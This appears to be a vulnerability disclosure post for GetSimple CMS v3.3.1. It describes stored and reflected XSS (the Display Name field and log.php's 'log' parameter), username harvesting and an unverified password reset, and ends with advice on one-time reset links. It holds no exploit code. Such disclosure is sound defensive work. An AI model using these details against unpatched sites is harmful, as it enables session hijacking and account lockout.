GetSimple is an XML and PHP based, stand-a-alone, fully independant and lite Content Management System (CMS). After performing some tests is was found that GetSimple CMS v3.3.1 has several security vulnerabilities.

Persistent Cross Site Scripting
The administrative interface does not always properly sanitize its input. The Display Name in the user’s profile settings allows malicious code to be insert. This might result in session hijacking since the cookies also do not have the proper security attributes enabled.

Reflected Cross Site Scripting
There is also a Reflected Cross Site Scripting vulnerability in the administrative interface. The file log.php uses a parameter called log which does not sanitize its input either.

Username Harvesting
The system displays different messages when a user does or doesn’t exist. A message displays an e-mail is sent (or in the video, an error message) when a user exists. If a user does not exist, no message is displayed.

Non-Secure Password Reset Mechanism
The password reset mechanism immediately resets the password upon request and does not perform any verification. An attacker could keep sending this request every X seconds which will keep users from logging in.

Another side effect is that the user’s e-mail will be bombed with a lot of password reset message.

An effective way to solve this issue is to send a one time password reset link to the user’s e-mail address (and make sure it is not vulnerable to replay attacks). If the link is used by the user, it should expire after the password has been successfully reset. Another thing to consider is to expire the link after X amount of time if it is not used.

In my opinion this is the only secure password reset mechanism, rather than sending a new password in plain text to the user’s e-mail address.

Share on Facebook0Share on Google+0Tweet about this on TwitterShare on LinkedIn0Email this to someonePin on Pinterest0Share on Reddit0Digg thisShare on Tumblr0Share on Yummly0Share on StumbleUpon0Flattr the author